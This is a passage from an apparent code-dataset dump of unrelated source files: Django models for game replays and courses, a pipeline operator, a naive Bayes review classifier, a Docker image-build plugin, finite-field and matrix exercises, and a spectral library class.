1,\n 'bBot': True,\n 'Assists': 0\n }\n \"\"\"\n Player.objects.get_or_create(\n replay=self,\n player_name=player['Name'].decode(chardet.detect(player['Name'])['encoding']),\n platform=player['Platform'].get('OnlinePlatform', ''),\n saves=player['Saves'],\n score=player['Score'],\n goals=player['Goals'],\n shots=player['Shots'],\n team=player['Team'],\n assists=player['Assists'],\n bot=player['bBot'],\n online_id=player['OnlineID'],\n )\n\n for index, goal in enumerate(data['Goals']):\n player, created = Player.objects.get_or_create(\n replay=self,\n player_name=goal['PlayerName'].decode(chardet.detect(goal['PlayerName'])['encoding']),\n team=goal['PlayerTeam'],\n )\n\n Goal.objects.get_or_create(\n replay=self,\n number=index + 1,\n player=player,\n frame=goal['frame'],\n )\n\n data['PlayerName'] = data['PlayerName'].decode(\n chardet.detect(data['PlayerName'])['encoding']\n )\n\n player, created = Player.objects.get_or_create(\n replay=self,\n player_name=data['PlayerName'],\n team=data.get('PrimaryPlayerTeam', 0),\n )\n\n self.replay_id = data['Id']\n self.player_name = data['PlayerName']\n self.player_team = data.get('PrimaryPlayerTeam', 0)\n\n map_obj, created = Map.objects.get_or_create(\n slug=data['MapName'].lower(),\n )\n\n self.map = map_obj\n self.timestamp = datetime.fromtimestamp(\n time.mktime(\n time.strptime(\n data['Date'],\n '%Y-%m-%d:%H-%M'\n )\n )\n )\n self.team_sizes = data['TeamSize']\n self.team_0_score = data.get('Team0Score', 0)\n self.team_1_score = data.get('Team1Score', 0)\n self.match_type = data['MatchType']\n self.server_name = data.get('ServerName', '')\n\n # Parser V2 values\n self.keyframe_delay = data['KeyframeDelay']\n self.max_channels = data['MaxChannels']\n self.max_replay_size_mb = data['MaxReplaySizeMB']\n self.num_frames = data['NumFrames']\n self.record_fps = data['RecordFPS']\n\n self.excitement_factor = self.calculate_excitement_factor()\n self.processed = True\n self.save()\n\n\nclass Player(models.Model):\n\n replay = models.ForeignKey(\n Replay,\n 
)\n\n player_name = models.CharField(\n max_length=100,\n db_index=True,\n )\n\n team = models.IntegerField()\n\n # 1.06 data\n score = models.PositiveIntegerField(\n default=0,\n blank=True,\n )\n\n goals = models.PositiveIntegerField(\n default=0,\n blank=True,\n )\n\n shots = models.PositiveIntegerField(\n default=0,\n blank=True,\n )\n\n assists = models.PositiveIntegerField(\n default=0,\n blank=True,\n )\n\n saves = models.PositiveIntegerField(\n default=0,\n blank=True,\n )\n\n platform = models.CharField(\n max_length=100,\n blank=True,\n null=True,\n db_index=True,\n )\n\n online_id = models.BigIntegerField(\n blank=True,\n null=True,\n db_index=True,\n )\n\n bot = models.BooleanField(\n default=False,\n )\n\n user_entered = models.BooleanField(\n default=False,\n )\n\n def __unicode__(self):\n return u'{} on Team {}'.format(\n self.player_name,\n self.team,\n )\n\n class Meta:\n ordering = ('team', '-score')\n\n\nclass Goal(models.Model):\n\n replay = models.ForeignKey(\n Replay,\n db_index=True,\n )\n\n # Goal 1, 2, 3 etc..\n number = models.PositiveIntegerField()\n\n player = models.ForeignKey(\n Player,\n db_index=True,\n )\n\n frame = models.IntegerField(\n blank=True,\n null=True,\n )\n\n def goal_time(self):\n if not self.frame or not self.replay.record_fps:\n return 'N/A'\n\n calculation = self.frame / self.replay.record_fps\n minutes, seconds = divmod(calculation, 60)\n return '%d:%02d' % (\n int(minutes),\n int(seconds),\n )\n\n def __unicode__(self):\n return u'Goal {} by {}'.format(\n self.number,\n self.player,\n )\n\n class Meta:\n ordering = ['number']\n\n\nclass ReplayPack(models.Model):\n\n title = models.CharField(\n max_length=50,\n )\n\n user = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n db_index=True,\n )\n\n replays = models.ManyToManyField(\n Replay,\n blank=True,\n )\n\n file = models.FileField(\n upload_to='uploads/replaypack_files',\n blank=True,\n null=True,\n )\n\n date_created = models.DateTimeField(\n auto_now_add=True,\n )\n\n last_updated = models.DateTimeField(\n auto_now=True,\n )\n\n def maps(self):\n maps = set([\n str(replay.map) for replay in self.replays.all()\n ])\n\n return ', '.join(maps)\n\n def goals(self):\n return sum([\n replay.team_0_score + replay.team_1_score\n for replay in self.replays.all()\n ])\n\n def players(self):\n players = set([\n player.player_name\n for replay in self.replays.all()\n for player in replay.player_set.all()\n ])\n\n return players\n\n def total_duration(self):\n calculation = sum([replay.num_frames for replay in self.replays.all()]) / 30\n minutes, seconds = divmod(calculation, 60)\n hours, minutes = divmod(minutes, 60)\n\n return '{} {}m {}s'.format(\n '{}h'.format(hours) if hours > 0 else '',\n int(minutes),\n int(seconds),\n )\n\n def __unicode__(self):\n return self.title\n\n def get_absolute_url(self):\n return reverse('replaypack:detail', kwargs={\n 'pk': self.pk,\n })\n\n class Meta:\n ordering = ['-last_updated', '-date_created']\n","sub_path":"rocket_league/apps/replays/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":15995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"232927963","text":"\"\"\"Defines the operator class.\n\nAn operator is a step in a pipeline, that executes a task, given a configuration, stage and data,\nand updates the stage.\nOperators have dependencies (on other operators / on the stage)\n\"\"\"\n\nfrom src.context.meta import MetaContext\nfrom src.services.service_provider import 
ServiceProviderHandler\nfrom src.services.filesystem.container import Container\nfrom .stages import Stage\n\nSERVICE = ServiceProviderHandler()\n\n\nclass Operator:\n \"\"\"\n An operator is a step in a pipeline, that executes a task, given a configuration, stage\n and data, and updates the stage.\n Operators have dependencies. In our case we choose to define dependencies using a stage,\n rather than pairwise dependencies.\n \"\"\"\n\n def __init__(self, operator_id: str, final_stage: \"Stage\", python_callable: callable):\n \"\"\"Create an Operator.\n\n :param operator_id: ID of the operator\n :param final_stage: stage that the operator triggers on completion\n :param python_callable: function to use to run the Operator.\n The python_callable should take 3 keyword arguments:\n - stage: a Stage object\n - context: a MetaContext object\n And it should return 2 objects:\n - output_context: a MetaContext object\n \"\"\"\n\n self._id = str(operator_id)\n self._python_callable = python_callable\n\n if isinstance(final_stage, str):\n final_stage = Container.get_stage(stage=final_stage)\n self.final_stage = final_stage\n\n def __call__(self, stage: \"Stage\", context: \"MetaContext\", scenario: \"Scenario\"):\n \"\"\"Executes the Operator.\n\n :param stage: a Stage object\n :param context: a MetaContext object or None\n\n Returns:\n :returns output_context: the new context\n \"\"\"\n\n assert isinstance(stage, Stage)\n\n with SERVICE.timer(context=str(context), task=self._id):\n output_context = self._python_callable(\n stage=stage,\n context=context,\n scenario=scenario,\n )\n\n return output_context\n","sub_path":"src/tasks/operators.py","file_name":"operators.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"259329274","text":"from collections import Counter\nimport math\n\n\n\nnegtext = open(\"hotelNegT-train.txt\").read()\n\n\npostext = open(\"hotelPosT-train.txt\").read()\n\n\npositivetext = open(\"hotelPosT-train.txt\").readlines()\n\nnegativetext = open(\"hotelNegT-train.txt\").readlines()\n\n\n\n\n\n\nposdocs = len(positivetext)\n\nnegdocs = len(negativetext)\n\ntotaldocs = posdocs + negdocs\n\n\n\nnegwords = negtext.split()\n\nposwords = postext.split()\n\ntotalwords = poswords + negwords\n\n\n\n\n\n#freqs = Counter(words)\n\n#for i in range(0, len(words) - 1):\n \n #if (freqs[words[i]] == 1):\n #words[i] = ''\n\n\nposfreqs = Counter(poswords)\n\nnegfreqs = Counter(negwords)\n\ntotalfreqs = Counter(totalwords)\n\n\n\n\n\n\nposN = sum(posfreqs.values())\n\nnegN = sum(negfreqs.values())\n\nN = sum(totalfreqs.values())\n\n\n\nV = len(totalfreqs)\n\n\n\ndef pick(doc):\n\n\n\tprobPos = 1\n\n\tprobNeg = 1\n\n\tfor i in doc.split():\n\n\t\tprobNeg = probNeg + math.log((negfreqs[i] + 1)/(totalfreqs[i] + V))\n\n\t\tprobPos = probPos + math.log((posfreqs[i] + 1)/(totalfreqs[i] + V))\n\n\n\n\n\n\tprobPos = probPos + math.log((posdocs/totaldocs))\n\n\tprobNeg = probNeg + math.log((negdocs/totaldocs))\n\n\tif(probPos > probNeg):\n\t\treturn True\n\n\telse:\n\t\treturn False\n\n\n\n\n\n\n\n#negativeTest = open(\"hotelNegT-TEST.txt\").readlines()\n\n#positiveTest = open(\"hotelPosT-TEST.txt\").readlines()\n\n\ntestSet = open(\"HW3-testset.txt\").readlines()\n\n\n\n\ne = open(\"ward-ethan-assgn3-out.txt\",\"w+\")\n\n\nfor i in testSet:\n\n\n\tID = i[0:7]\n\n\n\tresult = pick(i)\n\n\tif(result == True):\n\t\tx = \"POS\"\n\telse:\n\t\tx = \"NEG\"\n\n\te.write(ID + ' ' + x + 
'\\n')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Natural Language/HW3/assign3.py","file_name":"assign3.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"231379679","text":"from django.shortcuts import render\nfrom rest_framework import viewsets\nfrom .serializers import CourseSerializer\nfrom course.models import Course\nfrom enrollment.models import Enrollment\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\n\n\nclass CourseView(viewsets.ModelViewSet):\n serializer_class = CourseSerializer\n queryset = Course.objects.all()\n\n@api_view(['GET',])\ndef course_content_view(request):\n data = {}\n\n if request.user.is_staff or Enrollment.objects.filter(course_id = request.GET['course_id'], student_id = request.user.id).exists():\n if Course.objects.filter(id=request.GET['id']).exists():\n data['video_link'] = Course.objects.get(id=request.GET['id']).video_link\n data['content_html_path'] = Course.objects.get(id=request.GET['id']).content_html_path\n else:\n data['response'] = 'Course not found'\n else:\n data['response'] = 'You must be enrolled in the course to view course content.'\n\n return Response(data)\n\n\n@api_view(['POST',])\ndef enrollment_view(request):\n data = {}\n requested_course = request.GET['course_id']\n if Course.objects.filter(id=requested_course).exists():\n Enrollment.create(Course.objects.get(id=requested_course), request.user)\n data['response'] = 'You are successfully enrolled to the course of ' + requested_course\n else:\n data['response'] = 'Course not found'\n return Response(data)\n\n\n# @api_view(['POST',])\n# def post_course_content_view(request):\n# data = {}\n# if Course.objects.filter(id=request.GET['id']).exists():\n# data['video_link'] = Course.objects.get(id=request.GET['id']).video_link\n# data['content_html_path'] = Course.objects.get(id=request.GET['id']).content_html_path\n# else:\n# data['response'] = 'Course not found'\n#\n# return Response(data)\n","sub_path":"olp_backend/course/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"617703016","text":"import os\nimport yaml\nimport subprocess\nimport shutil\n\nfrom dogen.plugin import Plugin\n\n\nclass CCT(Plugin):\n @staticmethod\n def info():\n return \"cct\", \"Support for configuring images via cct\"\n\n def __init__(self, dogen, args):\n super(CCT, self).__init__(dogen, args)\n\n def extend_schema(self, parent_schema):\n \"\"\"\n Read in a schema definition for our part of the config and hook it\n into the parent schema at the cct: top-level key.\n \"\"\"\n schema_path = os.path.join(self.dogen.pwd, \"schema\", \"cct_schema.yaml\")\n schema = {}\n with open(schema_path, 'r') as fh:\n schema = yaml.safe_load(fh)\n\n parent_schema['map']['cct'] = schema\n\n def prepare(self, cfg):\n \"\"\"\n create cct changes yaml file for image.yaml template decscriptor\n it require cct aware template.jinja file\n \"\"\"\n # check if cct plugin has any steps to perform (prevent it from raising ugly exceptions)\n if not 'cct' in cfg:\n self.log.debug(\"No cct key in image.yaml - nothing to do\")\n return\n\n if os.path.exists(self.output + '/cct/'):\n shutil.rmtree(self.output + '/cct/')\n\n if 'modules' in cfg['cct']:\n self._prepare_modules(cfg)\n\n cfg['cct']['run'] = ['cct.yaml']\n\n 
cfg_file_dir = os.path.join(self.output, \"cct\")\n if not os.path.exists(cfg_file_dir):\n os.makedirs(cfg_file_dir)\n\n cfg_file = os.path.join(cfg_file_dir, \"cct.yaml\")\n with open(cfg_file, 'w') as f:\n yaml.dump(cfg['cct']['configure'], f)\n\n if 'runtime' in cfg['cct']:\n self.runtime_changes(cfg)\n\n if not 'user' in cfg['cct']:\n cfg['cct']['user'] = 'root'\n\n def _prepare_modules(self, cfg):\n for module in cfg['cct']['modules']:\n name = None\n if 'name' in module:\n name = module['name']\n elif module['path'][-1] == '/':\n name = os.path.basename(module['path'][0:-1])\n elif len(module['path']) > 4 and module['path'][-4:] == \".git\":\n name = os.path.basename(module['path'][0:-4])\n else:\n name = os.path.basename(module['path'])\n descriptor_dir = os.path.dirname(self.descriptor) + '/cct/'\n # check if module exists in cct dir next to do descriptor\n if os.path.exists(descriptor_dir + name):\n # path exists - I'll just copy it\n shutil.copytree(descriptor_dir + name,\n self.output + '/cct/' + name)\n self.log.info(\"Copied cct module %s.\" % name)\n else:\n # clone it to target dir if not exists\n self.clone_repo(module['path'], self.output + '/cct/' + name)\n self.log.info(\"Cloned cct module %s.\" % name)\n try:\n self.append_sources(name, cfg)\n except Exception as ex:\n self.log.info(\"cannot process sources for module %s\" % name)\n self.log.debug(\"exception: %s\" % ex)\n\n def clone_repo(self, url, path):\n try:\n if not os.path.exists(path):\n subprocess.check_call([\"git\", \"clone\", url, path])\n except Exception as ex:\n self.log.error(\"cannot clone repo %s into %s: %s\", url, path, ex)\n\n def append_sources(self, module, cfg):\n \"\"\"\n Extract sources defined within the module, if provided, and merge\n them with Dogen's master sources list.\n \"\"\"\n sources_path = os.path.join(self.output, \"cct\", module, \"sources.yaml\")\n\n if not os.path.exists(sources_path):\n self.log.debug(\"no sources defined for module %s\" % module)\n return\n\n source_prefix = os.getenv(\"DOGEN_CCT_SOURCES_PREFIX\") or \"\"\n if not source_prefix:\n self.log.debug(\"DOGEN_CCT_SOURCES_PREFIX variable is not defined\")\n\n cct_sources = []\n with open(sources_path) as f:\n cct_sources = yaml.load(f)\n\n dogen_sources = []\n for source in cct_sources:\n dogen_source = {}\n dogen_source['url'] = source_prefix + source['name']\n dogen_source['md5sum'] = source['md5sum']\n dogen_sources.append(dogen_source)\n try:\n cfg['sources'].extend(dogen_sources)\n except:\n cfg['sources'] = dogen_sources\n\n def runtime_changes(self, cfg):\n \"\"\"\n Handle configuring CCT for runtime use.\n\n User may supply a /cct/runtime key which will be written out as\n instructions for cct to execute at runtime.\n \"\"\"\n\n # write out a cctruntime.yaml file from the /cct/runtime_changes key\n cfg_file_dir = os.path.join(self.output, \"cct\")\n if not os.path.exists(cfg_file_dir):\n os.makedirs(cfg_file_dir)\n cfg_file = os.path.join(cfg_file_dir, \"cctruntime.yaml\")\n with open(cfg_file, 'w') as f:\n yaml.dump(cfg['cct']['runtime'], f)\n\n # adjust cfg object so template adds the above to ENTRYPOINT\n if not 'runtime_changes' in cfg['cct']:\n cfg['cct']['runtime_changes'] = \"/tmp/cct/cctruntime.yaml\"\n\n","sub_path":"dogen/plugins/cct.py","file_name":"cct.py","file_ext":"py","file_size_in_byte":5264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"426144434","text":"import math\r\nimport copy\r\nimport time\r\nfrom random import 
*\r\n\r\n\r\n\r\ndef decompose(n):\r\n L = []\r\n cpt = 0\r\n while (n % 2) == 0:\r\n cpt = cpt + 1\r\n n = n // 2\r\n if (cpt != 0):\r\n L += [[2,cpt]]\r\n i = 3\r\n while n != 1:\r\n cpt = 0\r\n while (n % i) == 0:\r\n cpt = cpt + 1\r\n n = n // i\r\n if (cpt != 0):\r\n L += [[i,cpt]]\r\n i = i + 2\r\n return L\r\n\r\n\r\ndef decompose(n):\r\n L=[]\r\n while n!=0:\r\n L = [n & 1] + L\r\n n = n >> 1\r\n return L\r\n\r\n\r\ndef evalue(Q,y,P):\r\n\tval=Q[0]\r\n\tfor i in range(1,len(Q)):\r\n\t\tval = multiplie(val,y,P) ^ Q[i] \r\n\treturn val\r\n\r\n\r\ndef inverse(x,P):\r\n m_ = len(bin(P)) - 3\r\n i = log_table[x]\r\n return alpha_table[((1 << m_)-1)-i]\r\n\r\n\r\ndef table_alpha(P):\r\n m_ = len(bin(P)) - 3\r\n cardinal = (1 << m_)\r\n L = [0]*(cardinal-1)\r\n z = 1\r\n for j in range(0, cardinal-1):\r\n L[j] = z\r\n z = multbyalpha(z,P)\r\n return L\r\n\r\n\r\ndef matmat(A,B):\r\n l=[]\r\n for i in range (len(A)):\r\n tmp = []\r\n for k in range(len(B[0])):\r\n s=0\r\n for j in range(len(A[0])):\r\n s+=(A[i][j])*(B[j][k])\r\n tmp.append(s)\r\n l.append(tmp)\r\n return l\r\n\r\n\r\ndef gentrianginf_inv(n,t):\r\n M = []\r\n for i in range(n):\r\n aux = []\r\n for j in range(i):\r\n aux = aux + [random.randrange(t)]\r\n aux = aux + [random.randrange(1,t)]\r\n aux = aux + [0]*(n-i-1)\r\n M = M + [aux]\r\n return M\r\n\r\n\r\ndef gentrianginf_mod26(n):\r\n not_trouve = True\r\n while not_trouve:\r\n M = [0]*n\r\n det = 1\r\n for i in range(n):\r\n M[i] = [0]*n\r\n for j in range(i):\r\n M[i][j] = random.randrange(26)\r\n M[i][i] = 2*random.randrange(13)+1\r\n det = det * M[i][i]\r\n not_trouve = (((det % 13) == 0) or ((det % 2)==0))\r\n return M\r\n\r\n\r\ndef genmatrix_inv(n):\r\n #pour l'intervalle du randrange, on peut mettre\r\n #ce que l'on veut, il n'y avait pas de contraintes\r\n # dans l'énoncé\r\n t = random.randrange(-99,99)\r\n M = gentrianginf_inv(n,t)\r\n N = gentrianginf_inv(n,t)\r\n N = transpose(N)\r\n prod = []\r\n for i in range(len(M)):\r\n aux = []\r\n for j in range(len(N[0])):\r\n somme = 0\r\n for k in range(len(M[0])):\r\n somme = somme + M[i][k] * N[k][j]\r\n aux = aux + [somme]\r\n prod = prod + [aux] \r\n return prod\r\n\r\n\r\ndef genmatrixinv_mod26(n):\r\n M = gentrianginf_mod26(n)\r\n N = gentrianginf_mod26(n)\r\n N = transpose(N)\r\n prod = []\r\n for i in range(len(M)):\r\n aux = []\r\n for j in range(len(N[0])):\r\n somme = 0\r\n for k in range(len(M[0])):\r\n somme = (somme + M[i][k] * N[k][j])%26\r\n aux = aux + [somme]\r\n prod = prod + [aux] \r\n return prod\r\n\r\n\r\ndef matvec(M,V):\r\n aux = []\r\n for i in range(len(M)):\r\n somme = 0\r\n for j in range(len(V)):\r\n somme = somme + M[i][j]*V[j]\r\n aux = aux + [somme]\r\n return aux\r\n\r\n\r\ndef circmultvec(M,V):\r\n W = []\r\n n = len(V)\r\n for i in range(n):\r\n # la ligne i commence avec l'element M[(n-i) % n]\r\n somme = 0\r\n for j in range(n):\r\n somme = somme + M[(j-i) % n]*V[j]\r\n W = W + [somme]\r\n return W\r\n \r\n \r\ndef circmultmat(A,B):\r\n\tP = []\r\n\tn = len(A)\r\n\tfor i in range(n):\r\n\t\tidxligneA = (-i % n)\r\n\t\taux = []\r\n\t\tfor j in range(n):\r\n\t\t\tsomme = 0\r\n\t\t\tfor k in range(n):\r\n\t\t\t\tidxligneB = (-k % n)\r\n\t\t\t\tsomme = somme + A[(idxligneA+k) % n]*B[(idxligneB+j) % n]\r\n\t\t\taux = aux + [somme]\r\n\t\tP = P + [aux]\r\n\treturn P\r\n\r\n\r\ndef prod_perm2(M,V):\r\n\tn = len(M)\r\n\tW = [] \r\n\tfor i in range(n):\r\n\t\tcpt = 0\r\n\t\twhile M[i] != 0:\r\n\t\t\tM[i] >>= 1\r\n\t\t\tcpt += 1\r\n\t\tW = W + [V[n-cpt]]\r\n\treturn W\r\n\r\n\r\ndef 
permute_from_list(L,V):\r\n\tW = []\r\n\tfor i in range(len(L)):\r\n\t\tW = W + [V[L[i]]]\r\n\treturn W\r\n\r\n\r\ndef is_triangsup(M):\r\n\tif len(M) != len(M[0]):\r\n\t\treturn False\r\n\tfor i in range(len(M)):\r\n\t\tfor j in range(i):\r\n\t\t\tif M[i][j] != 0:\r\n\t\t\t\treturn False\r\n\treturn True\r\n\r\n\r\ndef is_diag_dom(M):\r\n\test_dominante = True\r\n\ti = 0\r\n\twhile (i < len(M)) and (est_dominante):\r\n\t\tsomme = 0\r\n\t\tfor j in range(i):\r\n\t\t\tsomme = somme + abs(M[i][j])\r\n\t\tfor j in range(i+1,len(M)):\r\n\t\t\tsomme = somme + abs(M[i][j])\r\n\t\test_dominante = (abs(M[i][i]) >= somme)\r\n\t\ti = i + 1\r\n\treturn est_dominante\r\n\r\n\r\ndef is_diag_strict_dom(M):\r\n\test_dominante = True\r\n\ti = 0\r\n\twhile (i < len(M)) and (est_dominante):\r\n\t\tsomme = 0\r\n\t\tfor j in range(i):\r\n\t\t\tsomme = somme + abs(M[i][j])\r\n\t\tfor j in range(i+1,len(M)):\r\n\t\t\tsomme = somme + abs(M[i][j])\r\n\t\test_dominante = (abs(M[i][i]) > somme)\r\n\t\ti = i + 1\r\n\treturn est_dominante\r\n\r\n\r\ndef norme_infinie(L):\r\n\tmaxi = 0\r\n\tfor i in range(len(L)):\r\n\t\tsomme = 0\r\n\t\tfor j in range(len(L[0])):\r\n\t\t\tsomme = somme + abs(L[i][j])\r\n\t\tif somme > maxi:\r\n\t\t maxi = somme\r\n\treturn maxi\r\n\r\n\r\ndef norme_une(L):\r\n\tmax = 0\r\n\tfor j in range(len(L[0])):\r\n\t\tsomme = 0\r\n\t\tfor i in range(len(L)):\r\n\t\t\tsomme = somme + abs(L[i][j])\r\n\t\tif somme > max:\r\n\t\t max = somme\r\n\treturn max\r\n\r\n\r\ndef puissance(x,y,n):\r\n z = 1\r\n while y != 0:\r\n if (y & 1):\r\n z = (z * x) % n\r\n x = (x * x) % n\r\n y = y >> 1\r\n return z\r\n\r\n\r\n# ~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ fonctions annexes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\ndef multbyalpha(b,f):\r\n y = b << 1\r\n taille = len(bin(f))-3\r\n if ((y & (1 << taille)) != 0):\r\n y = y ^ f\r\n return y\r\n\r\n\r\ndef multiplie(b,c,f):\r\n\tprod_ = 0\r\n\taux_ = c\r\n\twhile (b != 0):\r\n\t\tif (b & 1)!= 0:\r\n\t\t\tprod_ = prod_ ^ aux_\r\n\t\taux_ = multbyalpha(aux_,f)\r\n\t\tb = b >> 1\r\n\treturn prod_\r\n\r\n\r\ndef table_log(P):\r\n m_ = len(bin(P)) - 3\r\n cardinal = (1 << m_)\r\n L = [0]*cardinal\r\n L[0] = -1\r\n z = 1\r\n for j in range(0, cardinal-1):\r\n L[z] = j\r\n z = multbyalpha(z,P)\r\n return L\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Licence_2/S3/I33/corrections_tp_math/tp6.py","file_name":"tp6.py","file_ext":"py","file_size_in_byte":6024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"38305696","text":"from django.db import models\n\nfrom .order import Order\n\nfrom artsumers.artsumersuser.models import ArtsumersUser\nfrom artsumers.core.models import TimeStampedModel\n\n\nclass ManagerMemo(TimeStampedModel):\n order = models.ForeignKey(Order, verbose_name='해당주문')\n memo = models.CharField(verbose_name='관리자메모', max_length=200)\n user = user = models.ForeignKey(\n ArtsumersUser, verbose_name='회원', null=True, blank=True)\n\n def __str__(self):\n return self.order.order_number\n\n class Meta:\n db_table = 'checkout_managermemo'\n ordering = ['-created_at']\n verbose_name = '관리자메모'\n verbose_name_plural = '관리자메모 관리'\n","sub_path":"artsumers/checkout/models/managermemo.py","file_name":"managermemo.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"160500804","text":"import unittest\n\nfrom model 
import churinjo\n\n\nclass ModelTest(unittest.TestCase):\n def setUp(self):\n print(\"Repository Test start\")\n\n def test_get_by_id(self):\n expected = 2\n actual = churinjo.get_churinjo_by_id(expected)\n self.assertEqual(expected, actual['id'])\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"test/model_test.py","file_name":"model_test.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"25155266","text":"#!/usr/bin/env python3\nfrom __future__ import print_function\nimport sys\ndef eprint(*args, **kwargs):\n print(*args, file=sys.stderr, **kwargs)\n\nimport re\nimport timeit\nimport os\nimport pathlib\n\nfrom mzlib.spectrum_library_index import SpectrumLibraryIndex\nfrom mzlib.spectrum import Spectrum\nfrom mzlib.index import MemoryIndex, SQLIndex\nfrom mzlib.backends import guess_implementation, SpectralLibraryBackendBase, SpectralLibraryWriterBase\n\n\ndebug = False\n\nclass SpectrumLibrary:\n \"\"\"\n SpectrumLibrary - Class for a spectrum library\n\n Attributes\n ----------\n identifier: str\n A unique identifier string assigned to this library by a spectral library host or\n provider.\n filename: str or Path\n A location on the local file system where the spectral library is stored\n format : string\n The name of the format for the current encoding of the library.\n backend: :class:`~.SpectralLibraryBackendBase`\n The implementation used to parse the file\n\n Methods\n -------\n read_header - Read just the header of the whole library\n read - Read the entire library into memory\n write - Write the library to disk\n create_index - Create an index file for this library\n transform - Not quite sure what this is supposed to be\n get_spectrum - Extract a single spectrum by identifier\n find_spectra - Return a list of spectra given query constraints\n\n \"\"\"\n\n\n def __init__(self, identifier=None, filename=None, format=None, index_type=None):\n \"\"\"\n __init__ - SpectrumLibrary constructor\n\n Parameters\n ----------\n format : string\n Name of the format for the current encoding of the library.\n\n \"\"\"\n self.backend = None\n self.identifier = identifier\n self.index_type = index_type\n self._format = format\n self.filename = filename\n\n def _init_from_filename(self, filename, index_type=None):\n if index_type is None:\n index_type = self.index_type\n if self.format is None:\n self.backend = guess_implementation(self.filename, index_type)\n self._format = self.backend.format_name\n else:\n backend_type = SpectralLibraryBackendBase.type_for_format(self.format)\n if backend_type is None:\n raise ValueError(\n f\"Could not find an implementation for {self.format}\")\n self.backend = backend_type(\n self.filename, index_type=index_type)\n self._format = self.backend.format_name\n\n def _backend_initialized(self):\n return self.backend is not None\n\n def _requires_backend(self):\n if not self._backend_initialized():\n raise ValueError(\n \"Cannot read library data, library parser not yet initialized\")\n\n #### Define getter/setter for attribute identifier\n @property\n def identifier(self):\n return(self._identifier)\n\n @identifier.setter\n def identifier(self, identifier):\n self._identifier = identifier\n\n #### Define getter/setter for attribute filename\n @property\n def filename(self):\n return(self._filename)\n\n @filename.setter\n def filename(self, filename):\n self._filename = filename\n if filename is not None:\n self._init_from_filename(filename)\n\n #### 
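# --- Editor's aside (illustrative addition, not part of the original source) ---
# A minimal, self-contained sketch of the getter/setter property pattern this
# class uses, where assigning `filename` lazily initializes a parsing backend.
# `DemoLibrary` and its string "backend" are hypothetical stand-ins invented
# for this sketch; they are not mzlib APIs.
class DemoLibrary:
    def __init__(self, filename=None):
        self._filename = None
        self.backend = None
        self.filename = filename  # assignment goes through the setter below

    @property
    def filename(self):
        return self._filename

    @filename.setter
    def filename(self, value):
        self._filename = value
        if value is not None:
            # stand-in for guess_implementation(filename, index_type)
            self.backend = "backend-for-%s" % value

# Usage: DemoLibrary("library.msp").backend == "backend-for-library.msp"
# --- end aside ---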
Define getter/setter for attribute format\n @property\n def format(self):\n return self._format\n\n @property\n def index(self):\n if self._backend_initialized():\n return self.backend.index\n return None\n\n @property\n def attributes(self):\n if self._backend_initialized():\n return self.backend.attributes\n return None\n\n def read_header(self):\n \"\"\"Read just the header of the whole library\n\n Returns\n -------\n bool:\n Whether the operation was successful\n \"\"\"\n self._requires_backend()\n return self.backend.read_header()\n\n def read(self):\n self._requires_backend()\n return self.backend.read()\n\n def write(self, destination, format=None):\n \"\"\"Write the library to disk\n \"\"\"\n filename = destination\n if not isinstance(filename, (str, pathlib.Path)):\n filename = getattr(destination, \"name\", None)\n\n if format is None and filename is not None:\n basename = os.path.basename(filename)\n tokens = basename.rsplit(\".\", 2)\n if len(tokens) == 3:\n writer_type = SpectralLibraryWriterBase.type_for_format('.'.join(tokens[1:]))\n else:\n raise ValueError(f\"Could not guess format from file name {filename}\")\n else:\n writer_type = SpectralLibraryWriterBase.type_for_format(format)\n if writer_type is None:\n raise ValueError(\n f\"Could not find a format writer from file name {filename} or format {format}\")\n writer = writer_type(destination)\n if self._backend_initialized():\n with writer:\n writer.write_library(self.backend)\n else:\n print(\"Library not initialized\")\n writer.close()\n\n def get_spectrum(self, spectrum_number=None, spectrum_name=None):\n \"\"\"Retrieve a single spectrum from the library.\n\n Parameters\n ----------\n spectrum_number : int, optional\n The index of the specturm in the library\n spectrum_name : str, optional\n The name of the spectrum in the library\n\n Returns\n -------\n :class:`~.Spectrum`\n \"\"\"\n self._requires_backend()\n return self.backend.get_spectrum(spectrum_number, spectrum_name)\n\n def find_spectra(self, specification, **query_keys):\n \"\"\"\n find_spectra - Return a list of spectra given query constraints\n \"\"\"\n self._requires_backend()\n return self.backend.find_spectra(specification, **query_keys)\n\n def __getitem__(self, i):\n self._requires_backend()\n return self.backend[i]\n\n def __len__(self):\n if self._backend_initialized():\n return len(self.backend)\n return 0\n\n def __iter__(self):\n if self._backend_initialized():\n return iter(self.backend)\n return iter([])\n\n def add_attribute(self, key, value, group_identifier=None):\n \"\"\"Add an attribute to the library level attributes store.\n\n Parameters\n ----------\n key : str\n The name of the attribute to add\n value : object\n The value of the attribute to add\n group_identifier : str, optional\n The attribute group identifier to use, if any. 
